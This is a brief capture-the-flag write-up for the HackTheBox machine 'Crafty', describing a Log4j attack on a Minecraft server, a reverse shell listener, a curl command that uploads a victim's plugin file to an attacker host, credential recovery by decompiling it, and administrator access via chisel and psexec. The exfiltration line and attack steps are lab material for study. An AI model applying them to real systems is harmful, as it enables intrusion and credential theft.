Crafty - HTB
Last updated
Last updated
first download minecraft client
download also log4j exploit
Also download jdk1.8.0_20
first lets connect to the minecraft server ,but note that sometimes it will only gives you 1 try to connect then either you need to use game launcher and do it through the chat ,or reset the machine .
first you need to modify the from /bin/sh to cmd.exe
run a listener on port 1337 as in command
run upload listener
and from victim machine do
curl -i -XPOST -F "files=@C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar" http://ur-IP/upload
use java decompiler jd-gui
found a password
its administrator password ,we can use manyways but my approach was to forward port 445 smb using chisel ,then use psexec from impacket tools to connect as administrator ,you can also use runas.exe